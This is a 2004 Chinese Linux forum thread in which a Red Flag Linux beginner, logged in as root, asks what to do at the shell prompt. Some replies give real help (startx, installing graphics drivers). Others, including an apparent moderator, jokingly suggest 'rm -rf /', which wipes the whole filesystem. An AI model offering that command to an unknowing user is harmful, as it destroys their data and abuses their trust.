dreampass 发表于 2004-7-9 02:55:12

显示了[root@licalhost root]#我该怎么做

本人用的是红旗4。0
我输入了ROOT和我的密码就显示#
我接下来就不知道怎么做了。望达人回一下谢谢了!
按回车就一直显示这行字啊?怎么做。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

12543122 发表于 2004-7-9 03:00:52

已经登录了。启动图形界面用命令    startx

gugong 发表于 2004-7-9 09:09:29

Re: 显示了[root@licalhost root]#我

本人用的是红旗4。0
按回车就一直显示这行字啊?怎么做。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

rm -rf /

后果和责任自负 ! :evil:

shadyslim 发表于 2004-7-9 09:16:20

Re: 显示了[root@licalhost root]#我

本人用的是红旗4。0

rm -rf /

gugong,你好狠啊!
:mrgreen::mrgreen::mrgreen:

sthdor 发表于 2004-7-9 10:06:16

rm -rf/

什么叫杀人于无形之中/:P

dreampass 发表于 2004-7-9 14:46:05

大哥。不知者无罪啊!!!RM-RF是什么啊?格式啊??

dreampass 发表于 2004-7-9 15:24:15

还是没什么用啊!大哥!。。。。。一大堆E文出来
好象还是进不去啊。晕啊。

visionalstar 发表于 2004-7-9 15:24:45

rm -rf /
意思是,把根目录下所有目录、文件删除

shadyslim 发表于 2004-7-9 16:13:43

visionalstar真是个诚实的好孩子!! :lol:

UMBRO 发表于 2004-7-9 16:38:50

应该是吧?

我觉得学一样新东西之前还是先多看看资料,稍微有点基础的好。

12543122 发表于 2004-7-9 16:43:33

不一定,“localhost” 是主机名,可以随便改 :mrgreen:

dreampass那个需要安装显卡驱动……

jiangtao9999 发表于 2004-7-9 17:28:17

出现这个提示表明你可以开始使用了…………

longyema 发表于 2004-7-9 20:42:05

老大 你真是我的偶像
我也有过这种时候
你已经到了可以操作的地方拉
简单说 你已经把你家大门开开了
下来你想干什么 可以告诉大家

snhym 发表于 2004-7-9 21:40:57

本人用的是红旗4。0

rm -rf /

不愧是版主

后果和责任自负 ! :evil:

dreampass 发表于 2004-7-10 02:47:01

是不是先放显卡的CD安装盘啊???
进不了桌面能自动安装吗???
大家帮帮我啊。好人做到底吧!!!!
页: [1] 2
查看完整版本: 显示了[root@licalhost root]#我该怎么做